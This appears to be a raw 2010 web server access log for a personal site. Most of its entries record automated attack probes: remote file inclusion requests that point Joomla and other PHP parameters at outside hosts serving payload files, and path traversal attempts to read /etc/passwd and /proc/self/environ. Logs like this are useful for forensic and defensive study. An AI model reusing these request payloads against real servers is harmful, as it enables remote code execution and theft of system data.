81.80.122.44 - - [26/Jul/2010:17:23:55 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
216.227.214.212 - - [26/Jul/2010:17:27:13 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
212.97.32.106 - - [26/Jul/2010:17:31:27 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.pujaportal.com/pujas/toolbar.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
123.64.69.209 - - [26/Jul/2010:17:39:09 -0700] "GET /logs/access_100621.log HTTP/1.1" 200 483276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
66.163.171.205 - - [26/Jul/2010:18:00:14 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:18:02:07 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
95.141.32.178 - - [26/Jul/2010:18:13:53 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.141.32.178 - - [26/Jul/2010:18:13:53 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
119.192.145.144 - - [26/Jul/2010:18:16:08 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
95.141.32.178 - - [26/Jul/2010:18:23:43 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.141.32.178 - - [26/Jul/2010:18:23:44 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
95.141.32.178 - - [26/Jul/2010:18:23:44 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:18:25:31 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
91.121.67.226 - - [26/Jul/2010:18:32:49 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
78.41.233.128 - - [26/Jul/2010:18:32:56 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.805" "www.redneckmba.com"
78.41.233.128 - - [26/Jul/2010:18:32:56 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.805" "www.redneckmba.com"
218.234.23.94 - - [26/Jul/2010:18:33:40 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [26/Jul/2010:18:33:40 -0700] "GET /logs/access.log%20%20//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
218.234.23.94 - - [26/Jul/2010:18:33:40 -0700] "GET /logs//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.wfps.tcc.edu.tw//appserv/p1.txt??????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
119.192.145.144 - - [26/Jul/2010:18:34:03 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
119.192.145.144 - - [26/Jul/2010:18:34:04 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
91.121.67.226 - - [26/Jul/2010:18:44:23 -0700] "GET /logs/?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.67.226 - - [26/Jul/2010:18:44:23 -0700] "GET /?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:19:24:29 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:19:24:32 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.15.156.75 - - [26/Jul/2010:19:41:45 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [26/Jul/2010:19:41:45 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
64.15.156.75 - - [26/Jul/2010:19:41:45 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:42:47 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:42:47 -0700] "GET /logs/access_100621.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:42:47 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:42:52 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "redneckmba.com"
64.15.156.75 - - [26/Jul/2010:19:49:08 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:51:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:51:31 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
221.120.250.84 - - [26/Jul/2010:19:51:31 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://faci.obihiro.ac.jp/uploads/byz9991.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.114.105 - - [26/Jul/2010:20:07:13 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:08:15 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:08:15 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:11:49 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:11:49 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
69.162.118.240 - - [26/Jul/2010:20:13:18 -0700] "GET /logs/access.log%20%20//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
69.162.118.240 - - [26/Jul/2010:20:13:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
69.162.118.240 - - [26/Jul/2010:20:13:23 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:14:33 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:20:51 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:20:52 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:22:44 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:20:24:45 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
69.162.118.240 - - [26/Jul/2010:20:27:50 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:34:22 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:34:22 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
216.117.144.54 - - [26/Jul/2010:20:34:22 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:39:38 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:39:38 -0700] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:39:38 -0700] "GET /logs/access.log%20%20///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
216.129.119.47 - - [26/Jul/2010:20:39:59 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:42:29 -0700] "GET /logs///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:42:29 -0700] "GET /logs/access.log///administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
62.44.73.150 - - [26/Jul/2010:20:42:29 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://refacing.biz/_/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:44:21 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:44:22 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
114.141.196.221 - - [26/Jul/2010:20:44:23 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
66.163.171.206 - - [26/Jul/2010:20:46:40 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:20:50:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
93.42.216.165 - - [26/Jul/2010:21:08:49 -0700] "GET /logs/access_081110.log/tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
93.42.216.165 - - [26/Jul/2010:21:08:49 -0700] "GET /tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
93.42.216.165 - - [26/Jul/2010:21:08:49 -0700] "GET /logs//tiny_includes/config.php?dir_ws=http://oklsdioj.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
76.13.114.106 - - [26/Jul/2010:21:20:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
216.117.144.54 - - [26/Jul/2010:21:27:19 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.honlapszerver.hu/.../id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
208.64.68.228 - - [26/Jul/2010:21:27:43 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [26/Jul/2010:21:27:43 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
208.64.68.228 - - [26/Jul/2010:21:27:43 -0700] "GET /logs/access.log/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://yogazz.t35.com/botz/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.205 - - [26/Jul/2010:21:31:39 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
114.141.196.221 - - [26/Jul/2010:21:39:45 -0700] "GET /logs/access_100614.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.clblista.hu/e107_plugins/id.log? HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.redneckmba.com"
76.13.123.194 - - [26/Jul/2010:21:41:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [26/Jul/2010:21:44:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:06:37 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:06:37 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "redneckmba.com"
66.163.171.207 - - [26/Jul/2010:22:06:52 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:07:17 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:07:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:07:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:07:29 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:07:57 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:07:58 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "redneckmba.com"
188.165.217.175 - - [26/Jul/2010:22:08:10 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.107 - - [26/Jul/2010:22:09:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:09:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:10:59 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:10:59 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:11:00 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:11:12 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:11:12 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
89.200.169.163 - - [26/Jul/2010:22:11:12 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.redneckmba.com"
64.34.172.171 - - [26/Jul/2010:22:12:15 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.redneckmba.com"
